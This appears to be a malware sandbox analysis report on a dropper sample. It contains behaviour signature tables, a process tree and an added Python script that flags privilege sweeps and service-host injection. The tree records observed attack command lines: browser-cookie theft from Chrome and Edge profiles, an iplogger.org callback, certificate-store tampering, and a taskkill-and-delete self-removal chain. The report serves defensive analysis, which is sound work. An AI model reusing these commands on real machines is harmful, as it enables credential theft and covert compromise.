Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\2 = "1" | svchost.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | Install.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) | Install.exe

Runs .reg file with regedit (2 IoCs)
pid | Process
7048 | regedit.exe
6516 | regedit.exe

Runs ping.exe (1 TTPs, 1 IoCs)
pid | Process
5516 | PING.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
4876 | rundll32.exe
4876 | rundll32.exe
2036 | svchost.exe
2036 | svchost.exe
4396 | pub2.exe
4396 | pub2.exe
3008 | Process not Found (this row is repeated for the remaining 58 of the 64 IoCs)

Suspicious behavior: MapViewOfSection (3 IoCs)
pid | Process
4396 | pub2.exe
4528 | MicrosoftEdgeCP.exe
4528 | MicrosoftEdgeCP.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2320 | MicrosoftEdge.exe (4 rows)
Token: SeCreateTokenPrivilege | 4316 | Install.exe
Token: SeAssignPrimaryTokenPrivilege | 4316 | Install.exe
Token: SeLockMemoryPrivilege | 4316 | Install.exe
Token: SeIncreaseQuotaPrivilege | 4316 | Install.exe
Token: SeMachineAccountPrivilege | 4316 | Install.exe
Token: SeTcbPrivilege | 4316 | Install.exe
Token: SeSecurityPrivilege | 4316 | Install.exe
Token: SeTakeOwnershipPrivilege | 4316 | Install.exe
Token: SeLoadDriverPrivilege | 4316 | Install.exe
Token: SeSystemProfilePrivilege | 4316 | Install.exe
Token: SeSystemtimePrivilege | 4316 | Install.exe
Token: SeProfSingleProcessPrivilege | 4316 | Install.exe
Token: SeIncBasePriorityPrivilege | 4316 | Install.exe
Token: SeCreatePagefilePrivilege | 4316 | Install.exe
Token: SeCreatePermanentPrivilege | 4316 | Install.exe
Token: SeBackupPrivilege | 4316 | Install.exe
Token: SeRestorePrivilege | 4316 | Install.exe
Token: SeShutdownPrivilege | 4316 | Install.exe
Token: SeDebugPrivilege | 4316 | Install.exe
Token: SeAuditPrivilege | 4316 | Install.exe
Token: SeSystemEnvironmentPrivilege | 4316 | Install.exe
Token: SeChangeNotifyPrivilege | 4316 | Install.exe
Token: SeRemoteShutdownPrivilege | 4316 | Install.exe
Token: SeUndockPrivilege | 4316 | Install.exe
Token: SeSyncAgentPrivilege | 4316 | Install.exe
Token: SeEnableDelegationPrivilege | 4316 | Install.exe
Token: SeManageVolumePrivilege | 4316 | Install.exe
Token: SeImpersonatePrivilege | 4316 | Install.exe
Token: SeCreateGlobalPrivilege | 4316 | Install.exe
Token: 31 | 4316 | Install.exe
Token: 32 | 4316 | Install.exe
Token: 33 | 4316 | Install.exe
Token: 34 | 4316 | Install.exe
Token: 35 | 4316 | Install.exe
Token: SeDebugPrivilege | 4212 | KRSetp.exe
Token: SeDebugPrivilege | 4876 | rundll32.exe
Token: SeDebugPrivilege | 2036 | svchost.exe
Token: SeDebugPrivilege | 4876 | rundll32.exe (12 rows)
Token: SeDebugPrivilege | 4984 | taskkill.exe
Token: SeAssignPrimaryTokenPrivilege | 2744 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2744 | svchost.exe
Token: SeSecurityPrivilege | 2744 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2744 | svchost.exe
Token: SeLoadDriverPrivilege | 2744 | svchost.exe
Token: SeSystemtimePrivilege | 2744 | svchost.exe
Token: SeBackupPrivilege | 2744 | svchost.exe
Token: SeRestorePrivilege | 2744 | svchost.exe
Token: SeShutdownPrivilege | 2744 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2744 | svchost.exe
Suspicious use of FindShellTrayWindow 6 IoCs
pid   Process
2112  File.exe (4 entries)
3008  Process not Found (2 entries)

Suspicious use of SendNotifyMessage 4 IoCs
pid   Process
2112  File.exe (4 entries)

Suspicious use of SetWindowsHookEx 10 IoCs
pid   Process
2320  MicrosoftEdge.exe
4248  Info.exe
4528  MicrosoftEdgeCP.exe (2 entries)
5612  PqvGsfeLzoFewvfPJpfwL5el.exe
5660  Qme2sFpaAjRiZgbn9sDjN91x.exe
6048  RO3QNbYnukhvSgCvLm09jbuj.exe
6092  wcvBkjEvJwuMtZyCqWUE6pBz.exe
6068  TlTunaSTsvMnMn1ZPIfAsKr9.exe
5132  EmTzd0lcH7R71dNGqBDqz17C.exe

Suspicious use of UnmapMainImage 1 IoCs
pid   Process
3008  Process not Found
Suspicious use of WriteProcessMemory 64 IoCs
Source PID  Source process                        Target PID  Target index  Entries
1400        88A990A868EADA802839185B6F05C541.exe  3916        75            3
3916        Files.exe                             2112        77            3
1400        88A990A868EADA802839185B6F05C541.exe  4168        81            3
1400        88A990A868EADA802839185B6F05C541.exe  4212        82            2
1400        88A990A868EADA802839185B6F05C541.exe  4248        84            3
1400        88A990A868EADA802839185B6F05C541.exe  4292        86            3
1400        88A990A868EADA802839185B6F05C541.exe  4316        85            3
1400        88A990A868EADA802839185B6F05C541.exe  4396        87            3
4168        Folder.exe                            4516        89            3
4820        rUNdlL32.eXe                          4876        94            3
4876        rundll32.exe                          2036        69            1
2036        svchost.exe                           4964        95            3
4876        rundll32.exe                          2664        28            1
4876        rundll32.exe                          1020        60            1
4876        rundll32.exe                          2464        31            1
4876        rundll32.exe                          2432        32            1
4876        rundll32.exe                          1076        56            1
4876        rundll32.exe                          924         57            1
4876        rundll32.exe                          1428        48            1
4316        Install.exe                           4472        97            3
4876        rundll32.exe                          1904        40            1
4876        rundll32.exe                          1204        52            1
4876        rundll32.exe                          1324        50            1
4876        rundll32.exe                          2744        25            1
4876        rundll32.exe                          2756        13            1
4472        cmd.exe                               4984        99            3
4528        MicrosoftEdgeCP.exe                   4976        103           4
4248        Info.exe                              5480        109           3
4248        Info.exe                              5512        108           3
4248        Info.exe                              5540        114           3

Note: the thirteen targets of rundll32.exe (4876, the process hosting axhub.dll) are all svchost.exe service hosts that appear in the process tree below: 2036 (BITS), 2664 (Browser), 1020 (gpsvc), 2464 (IKEEXT), 2432 (LanmanServer), 1076 (ProfSvc), 924 (Schedule), 1428 (SENS), 1904 (ShellHWDetection), 1204 (Themes), 1324 (UserManager), 2744 (Winmgmt) and 2756 (WpnService). A single writer touching the memory of every netsvcs host is the signature of service-host injection rather than of one parent staging a single child. The entries from 1400, 3916, 4168, 4316, 4472 and 4248 are the ordinary three-write pattern of a parent starting a child it dropped.
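The two tables above are only useful if something reads them. The following Python is an added example written for this page, not part of the sandbox's output or of any of the malware families it names. It parses a constructed subset of the AdjustPrivilegeToken and WriteProcessMemory entries (line format copied from the report), flags a process that sweeps many privileges or any high-risk one, and flags a single source PID writing into several distinct target processes. The PROCESS_IMAGE map, the HIGH_RISK set and the thresholds are assumptions made for the example; the PID-to-image pairs are taken from the process tree below.

```python
"""Detection heuristics over two flattened sandbox signature tables:
'Suspicious use of AdjustPrivilegeToken' and 'Suspicious use of WriteProcessMemory'.
Added example for this page; sample lines are a constructed subset of the report."""
import re
from collections import defaultdict

# Constructed sample: a subset of the report's AdjustPrivilegeToken entries.
TOKEN_LOG = """
Token: SeDebugPrivilege 2320 MicrosoftEdge.exe
Token: SeCreateTokenPrivilege 4316 Install.exe
Token: SeAssignPrimaryTokenPrivilege 4316 Install.exe
Token: SeTcbPrivilege 4316 Install.exe
Token: SeLoadDriverPrivilege 4316 Install.exe
Token: SeDebugPrivilege 4316 Install.exe
Token: 31 4316 Install.exe
Token: 35 4316 Install.exe
Token: SeDebugPrivilege 4212 KRSetp.exe
Token: SeDebugPrivilege 4876 rundll32.exe
Token: SeDebugPrivilege 4984 taskkill.exe
Token: SeBackupPrivilege 2744 svchost.exe
Token: SeRestorePrivilege 2744 svchost.exe
"""

# Constructed sample: a subset of the report's WriteProcessMemory entries
# ("PID <src> wrote to memory of <dst> <src> <process> <target index>").
WPM_LOG = """
PID 1400 wrote to memory of 3916 1400 88A990A868EADA802839185B6F05C541.exe 75
PID 3916 wrote to memory of 2112 3916 Files.exe 77
PID 4820 wrote to memory of 4876 4820 rUNdlL32.eXe 94
PID 4876 wrote to memory of 2036 4876 rundll32.exe 69
PID 4876 wrote to memory of 2664 4876 rundll32.exe 28
PID 4876 wrote to memory of 1020 4876 rundll32.exe 60
PID 4876 wrote to memory of 2464 4876 rundll32.exe 31
PID 4876 wrote to memory of 924 4876 rundll32.exe 57
PID 4876 wrote to memory of 2744 4876 rundll32.exe 25
PID 4248 wrote to memory of 5480 4248 Info.exe 109
PID 4248 wrote to memory of 5512 4248 Info.exe 108
"""

# PID -> image name, taken from the process tree in this report (subset; assumed map).
PROCESS_IMAGE = {
    2036: "svchost.exe", 2664: "svchost.exe", 1020: "svchost.exe",
    2464: "svchost.exe", 924: "svchost.exe", 2744: "svchost.exe",
    3916: "Files.exe", 2112: "File.exe", 4876: "rundll32.exe",
    5480: "bz7NidxgK752OQuKGpXs5iwz.exe", 5512: "WGbVcIBAsQcSiFMmqHFE8wq9.exe",
}

# Privileges whose enablement by a user-mode dropper is rarely legitimate (assumed set).
HIGH_RISK = {"SeDebugPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
             "SeAssignPrimaryTokenPrivilege", "SeLoadDriverPrivilege"}

TOKEN_RE = re.compile(r"Token:\s+(\S+)\s+(\d+)\s+(\S+)")
WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) (\d+)")


def parse_tokens(text):
    """Return {(pid, process): set(privileges)} from AdjustPrivilegeToken lines."""
    out = defaultdict(set)
    for m in TOKEN_RE.finditer(text):
        priv, pid, proc = m.groups()
        out[(int(pid), proc)].add(priv)
    return dict(out)


def flag_privilege_sweeps(text, min_count=5):
    """Flag processes that enabled many privileges at once, or any high-risk one.
    Numeric entries (e.g. '31') are LUIDs the sandbox could not name; they count too."""
    hits = []
    for (pid, proc), privs in parse_tokens(text).items():
        risky = sorted(privs & HIGH_RISK)
        if len(privs) >= min_count or risky:
            hits.append({"pid": pid, "process": proc,
                         "privileges": len(privs), "high_risk": risky,
                         "sweep": len(privs) >= min_count})
    return sorted(hits, key=lambda h: h["pid"])


def flag_injection_fanout(text, images, min_targets=3):
    """Flag a source PID that writes into >= min_targets distinct processes,
    and report how many of those targets are service hosts (svchost.exe)."""
    targets = defaultdict(set)
    for m in WPM_RE.finditer(text):
        src, dst, proc, _idx = m.groups()
        targets[(int(src), proc)].add(int(dst))
    hits = []
    for (src, proc), dsts in targets.items():
        if len(dsts) >= min_targets:
            svc = sum(1 for d in dsts if images.get(d) == "svchost.exe")
            hits.append({"pid": src, "process": proc,
                         "targets": len(dsts), "svchost_targets": svc})
    return sorted(hits, key=lambda h: h["pid"])


if __name__ == "__main__":
    for h in flag_privilege_sweeps(TOKEN_LOG):
        print("PRIV", h)
    for h in flag_injection_fanout(WPM_LOG, PROCESS_IMAGE):
        print("WPM ", h)
```

On the sample, the privilege rule fires on Install.exe (sweep plus five high-risk rights) and on every SeDebugPrivilege holder, while svchost 2744 with only backup/restore rights stays quiet; the fan-out rule fires only on rundll32.exe 4876, all of whose targets are service hosts. The three-write pairs from parents to their own dropped children stay below the fan-out threshold by design.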
Processes
Indentation shows parent/child depth. Each node gives the sandbox PID and the command line; where the image path differs from the executable named in the command line (WoW64 redirection, case-mangled rundll32, relative names) the image is given in parentheses. "tags" lists the behaviour signatures the sandbox attached to that process. PIDs 2488, 5480 and 6404 each appear on two nodes: the sandbox reports a PID as reused once the earlier process has exited.

- PID 2756  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
- PID 2744  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    tags: Suspicious use of AdjustPrivilegeToken
- PID 2664  c:\windows\system32\svchost.exe -k netsvcs -s Browser
- PID 2464  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
- PID 2432  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
- PID 1904  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
- PID 1428  c:\windows\system32\svchost.exe -k netsvcs -s SENS
- PID 1324  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
- PID 1204  c:\windows\system32\svchost.exe -k netsvcs -s Themes
- PID 1076  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
- PID 924   c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    tags: Drops file in System32 directory
- PID 1020  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
- PID 1400  "C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe"
    tags: Checks computer location settings; Suspicious use of WriteProcessMemory
  - PID 3916  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      tags: Executes dropped EXE; Checks computer location settings; Suspicious use of WriteProcessMemory
    - PID 2112  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
        tags: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  - PID 4168  "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      tags: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - PID 4516  "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
        tags: Executes dropped EXE
  - PID 4212  "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
      tags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
  - PID 4248  "C:\Users\Admin\AppData\Local\Temp\Info.exe"
      tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - PID 5512  "C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe"
        tags: Executes dropped EXE
      - PID 1336  C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe
      - PID 6028  C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe
    - PID 5480  "C:\Users\Admin\Documents\bz7NidxgK752OQuKGpXs5iwz.exe"
        tags: Executes dropped EXE
      - PID 4836  C:\Users\Admin\Documents\bz7NidxgK752OQuKGpXs5iwz.exe
    - PID 5612  "C:\Users\Admin\Documents\PqvGsfeLzoFewvfPJpfwL5el.exe"
        tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      - PID 5276  "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp  (image: C:\Windows\SysWOW64\cmd.exe)
        - PID 4900  cmd  (image: C:\Windows\SysWOW64\cmd.exe)
          - PID 5764  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp  (image: C:\Windows\SysWOW64\findstr.exe)
          - PID 5828  Acre.exe.com k  (image: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com)
            - PID 1268  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
          - PID 5516  ping 127.0.0.1 -n 30  (image: C:\Windows\SysWOW64\PING.EXE)
              tags: Runs ping.exe
    - PID 5588  "C:\Users\Admin\Documents\7C0sF6DCguOrqWtIfI8Y5Fw2.exe"
        tags: Executes dropped EXE
    - PID 5540  "C:\Users\Admin\Documents\ssFqA60ovSmfzaH0YHkP__Bp.exe"
        tags: Executes dropped EXE
      - PID 2312  C:\Users\Admin\Documents\ssFqA60ovSmfzaH0YHkP__Bp.exe
    - PID 5660  "C:\Users\Admin\Documents\Qme2sFpaAjRiZgbn9sDjN91x.exe"
        tags: Executes dropped EXE; Drops file in Program Files directory; Suspicious use of SetWindowsHookEx
      - PID 5796  "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
        - PID 6244  "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
      - PID 4180  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "  (image: C:\Windows\SysWOW64\cmd.exe)
        - PID 4244  explorer https://iplogger.org/2LBCU6  (image: C:\Windows\SysWOW64\explorer.exe)
        - PID 7048  regedit /s adj.reg  (image: C:\Windows\SysWOW64\regedit.exe)
            tags: Runs .reg file with regedit
        - PID 6516  regedit /s adj2.reg  (image: C:\Windows\SysWOW64\regedit.exe)
            tags: Runs .reg file with regedit
    - PID 5648  "C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe"
        tags: Executes dropped EXE
      - PID 5404  C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe
        - PID 6832  "C:\Windows\System32\cmd.exe" /c taskkill /im seBCf4ZlNLZ9PaeYpIEYTmZ6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe" & del C:\ProgramData\*.dll & exit  (image: C:\Windows\SysWOW64\cmd.exe)
          - PID 6364  taskkill /im seBCf4ZlNLZ9PaeYpIEYTmZ6.exe /f  (image: C:\Windows\SysWOW64\taskkill.exe)
              tags: Kills process with taskkill
    - PID 6120  "C:\Users\Admin\Documents\JUaHo_m_PyvcqrF6QEipVMNQ.exe"
        tags: Executes dropped EXE
      - PID 4776  C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 660
          tags: Program crash
      - PID 5656  C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 672
          tags: Program crash
      - PID 4192  C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 676
          tags: Program crash
      - PID 5480  C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 692
          tags: Program crash
      - PID 5576  C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 1088
          tags: Program crash
    - PID 6068  "C:\Users\Admin\Documents\TlTunaSTsvMnMn1ZPIfAsKr9.exe"
        tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      - PID 4604  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        - PID 2368  "C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\setup_install.exe"
          - PID 4896  C:\Windows\system32\cmd.exe /c karotima_2.exe  (image: C:\Windows\SysWOW64\cmd.exe)
            - PID 2808  karotima_2.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_2.exe)
              - PID 5860  "C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_2.exe" -a
          - PID 5644  C:\Windows\system32\cmd.exe /c karotima_1.exe  (image: C:\Windows\SysWOW64\cmd.exe)
            - PID 4680  karotima_1.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_1.exe)
              - PID 6592  "C:\Users\Admin\Documents\Pnz8WdEQby5XYebsoB7OoQ7p.exe"
              - PID 7092  "C:\Users\Admin\Documents\1CM_B4fPtmf95wMVY3kJJVoN.exe"
                - PID 6404  C:\Users\Admin\Documents\1CM_B4fPtmf95wMVY3kJJVoN.exe
                  - PID 5408  C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 24
                      tags: Program crash
              - PID 7132  "C:\Users\Admin\Documents\kScOjC7j4e_OKZOhOuScw_O6.exe"
                - PID 6468  C:\Users\Admin\Documents\kScOjC7j4e_OKZOhOuScw_O6.exe
              - PID 6360  "C:\Users\Admin\Documents\LddNQ9bQW1nk2OQ0v1kdpoOR.exe"
                - PID 6260  C:\Users\Admin\Documents\LddNQ9bQW1nk2OQ0v1kdpoOR.exe
              - PID 6392  "C:\Users\Admin\Documents\A51f3igjY71GJ8OkVigv7WRd.exe"
              - PID 6680  "C:\Users\Admin\Documents\w9fM7ytZGdYHfXLQbKrKJbaP.exe"
                - PID 6404  "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp  (image: C:\Windows\SysWOW64\cmd.exe)
                  - PID 5264  cmd  (image: C:\Windows\SysWOW64\cmd.exe)
                    - PID 6952  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp  (image: C:\Windows\SysWOW64\findstr.exe)
              - PID 2524  "C:\Users\Admin\Documents\rcZrGiruGiEOay_9GbGkNn5J.exe"
              - PID 6672  "C:\Users\Admin\Documents\NDPLDjSfraiGyoB5RxkbB20Y.exe"
              - PID 6664  "C:\Users\Admin\Documents\VYipn39Jx8CFWksFoiAAVMx_.exe"
              - PID 6656  "C:\Users\Admin\Documents\oVsr49wXmrGLvqqYXms1l9ID.exe"
                - PID 1840  "C:\Users\Admin\Documents\oVsr49wXmrGLvqqYXms1l9ID.exe"
              - PID 6644  "C:\Users\Admin\Documents\m2NBwoGR401e0o23CsAbBsRW.exe"
              - PID 6636  "C:\Users\Admin\Documents\mbQCt7Vi0jt3t7Ekrz7M38ai.exe"
              - PID 6632  "C:\Users\Admin\Documents\f0OpjkLZgSgJSp2ShYrgv2xJ.exe"
              - PID 6608  "C:\Users\Admin\Documents\wPXGEBN_gKnBDhupoHgOGN4s.exe"
              - PID 6588  "C:\Users\Admin\Documents\rUULchauzCWUt9y_rdMgO2Tg.exe"
              - PID 6580  "C:\Users\Admin\Documents\EtFIJ6vOUrinBA31lO0MlAHL.exe"
                - PID 1928  C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 660
                    tags: Program crash
                - PID 4324  C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 672
                    tags: Program crash
                - PID 6956  C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 784
                    tags: Program crash
                - PID 4700  C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 820
                    tags: Program crash
                - PID 5288  C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1080
                    tags: Program crash
              - PID 6568  "C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe"
                - PID 7096  C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe
                - PID 5440  C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe
              - PID 5608  "C:\Users\Admin\Documents\VGzavJkVdEQ1slkBwJlUEhkT.exe"
              - PID 5632  "C:\Users\Admin\Documents\gEojMin8A_YoTm8Q6LwN4pIt.exe"
              - PID 7128  "C:\Users\Admin\Documents\BM_E_RdgTpiYFiPRwI_U1LO_.exe"
    - PID 6080  "C:\Users\Admin\Documents\sY07eraSUn_mxBuBdNDCn059.exe"
        tags: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger
    - PID 6092  "C:\Users\Admin\Documents\wcvBkjEvJwuMtZyCqWUE6pBz.exe"
        tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx
    - PID 6048  "C:\Users\Admin\Documents\RO3QNbYnukhvSgCvLm09jbuj.exe"
        tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      - PID 2448  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - PID 2096  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - PID 6424  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - PID 6864  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    - PID 6024  "C:\Users\Admin\Documents\WqU8afrqJ_wEl7LC18l5PV1i.exe"
        tags: Executes dropped EXE
    - PID 6036  "C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe"
        tags: Executes dropped EXE
      - PID 4032  C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe
      - PID 5352  C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe
      - PID 5360  C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe
      - PID 2452  C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe
      - PID 4360  C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe
      - PID 2488  C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe
    - PID 6020  "C:\Users\Admin\Documents\lmaJgmjUdnJRcF8me39B6cpp.exe"
        tags: Executes dropped EXE
      - PID 2208  "C:\Users\Admin\Documents\lmaJgmjUdnJRcF8me39B6cpp.exe"
    - PID 6000  "C:\Users\Admin\Documents\efZJSzwJLtDVOkr6nI6JeUNG.exe"
        tags: Executes dropped EXE
      - PID 3148  "C:\Users\Admin\AppData\Roaming\2930291.exe"
      - PID 4760  "C:\Users\Admin\AppData\Roaming\6864878.exe"
    - PID 3208  "C:\Users\Admin\Documents\9eTvqwvLIlaadnIeHwiSKWLU.exe"
        tags: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger
    - PID 6012  "C:\Users\Admin\Documents\w9dso34OfUUaZ8ZCNNnLh8kf.exe"
        tags: Executes dropped EXE
      - PID 5272  C:\Users\Admin\Documents\w9dso34OfUUaZ8ZCNNnLh8kf.exe
    - PID 5132  "C:\Users\Admin\Documents\EmTzd0lcH7R71dNGqBDqz17C.exe"
        tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      - PID 6016  "C:\Users\Admin\Documents\EmTzd0lcH7R71dNGqBDqz17C.exe" -a
  - PID 4316  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      tags: Executes dropped EXE; Modifies system certificate store; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - PID 4472  cmd.exe /c taskkill /f /im chrome.exe  (image: C:\Windows\SysWOW64\cmd.exe)
        tags: Suspicious use of WriteProcessMemory
      - PID 4984  taskkill /f /im chrome.exe  (image: C:\Windows\SysWOW64\taskkill.exe)
          tags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 4292  "C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
      tags: Executes dropped EXE; Checks whether UAC is enabled
  - PID 4396  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
      tags: Executes dropped EXE; Loads dropped DLL; Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection
- PID 2036  c:\windows\system32\svchost.exe -k netsvcs -s BITS  (image: \??\c:\windows\system32\svchost.exe)
    tags: Suspicious use of SetThreadContext; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - PID 4964  C:\Windows\system32\svchost.exe -k SystemNetworkService
      tags: Drops file in System32 directory; Checks processor information in registry; Modifies data under HKEY_USERS; Modifies registry class
- PID 2320  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    tags: Drops file in Windows directory; Modifies Internet Explorer settings; Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
- PID 1232  C:\Windows\system32\browser_broker.exe -Embedding
    tags: Modifies Internet Explorer settings
- PID 4528  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    tags: Modifies registry class; Suspicious behavior: MapViewOfSection; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
- PID 4768  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    tags: Modifies Internet Explorer settings; Modifies registry class
